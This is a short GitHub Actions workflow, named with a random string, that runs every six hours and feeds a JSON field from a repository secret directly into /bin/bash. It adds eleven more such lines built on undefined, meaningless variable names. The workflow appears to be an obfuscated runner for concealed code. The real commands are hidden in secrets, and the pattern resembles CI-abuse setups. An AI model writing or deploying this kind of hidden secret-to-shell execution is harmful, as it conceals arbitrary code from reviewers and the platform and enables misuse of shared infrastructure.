name: liutang19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liutang19871010
        env:
          zq01: ${{ secrets.zq01 }}
        run: |
          echo $zq01 | jq -r .qs98 | /bin/bash
          echo $jqgwq781 | jq -r .di37676 | /bin/bash
          echo $vb23712 | jq -r .avutx0108 | /bin/bash
          echo $pz98324 | jq -r .yzyt1 | /bin/bash
          echo $sy59195 | jq -r .knl4 | /bin/bash
          echo $n398 | jq -r .dufxq896 | /bin/bash
          echo $dc89211 | jq -r .qoyct734 | /bin/bash
          echo $tje56 | jq -r .uf70025 | /bin/bash
          echo $econ2 | jq -r .gvze48 | /bin/bash
          echo $mpxjt620 | jq -r .q677 | /bin/bash
          echo $xzfg68369 | jq -r .dvexp2 | /bin/bash
          echo $sl96 | jq -r .zdxk57284 | /bin/bash

